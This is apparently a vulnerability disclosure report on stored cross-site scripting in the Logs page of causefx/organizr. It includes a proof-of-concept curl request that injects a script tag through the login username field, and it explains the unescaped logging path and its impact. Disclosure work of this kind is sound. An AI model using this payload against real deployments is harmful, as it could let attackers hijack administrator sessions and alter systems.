XSS affecting "Logs" Page in causefx/organizr
Apr 5th 2022
Additional reviews found the application did not appear to provide any cutoff to the payloads length. Given this, it would be possible for threat actors to place complex and large payloads.
Proof of Concept
// PoC.js curl 'http://localhost/api/v2/login' -X POST -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Token: null' -H 'formKey: $2y$10$7DQp3wVaXory9HSag3/qF.P8PULxQXV5kwEnwkCpsp/eZBAaVib4q' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://localhost' -H 'Connection: keep-alive' -H 'Referer: http://localhost/' -H 'Cookie: organizrLanguage=en; organizr_user_uuid=38a2bb5e-3cd6-4156-a8bb-4eed8be6cf36' --data-raw 'loginAttempts=1&tfaCode=&username=%3Cscript%3Ealert(2)%3B%3C%2Fscript%3E&password=asdf&remember=true&oAuth=&oAuthType=&formKey=%242y%2410%247DQp3wVaXory9HSag3%2FqF.P8PULxQXV5kwEnwkCpsp%2FeZBAaVib4q'
A review of orgaizr's code found this vulnerability lies in the logging functions. The "setLoggerChannel()" function calls "setupLogger()" which leverages the user supplied username within the "setTraceId()" call. Prior to passing the username to setTraceId(), the value should be escaped .
Given that this vulnerability can target high level users, the impact is potentially severe. Leveraging this, a threat actor could create arbitrary users, or make malicious changes to the system.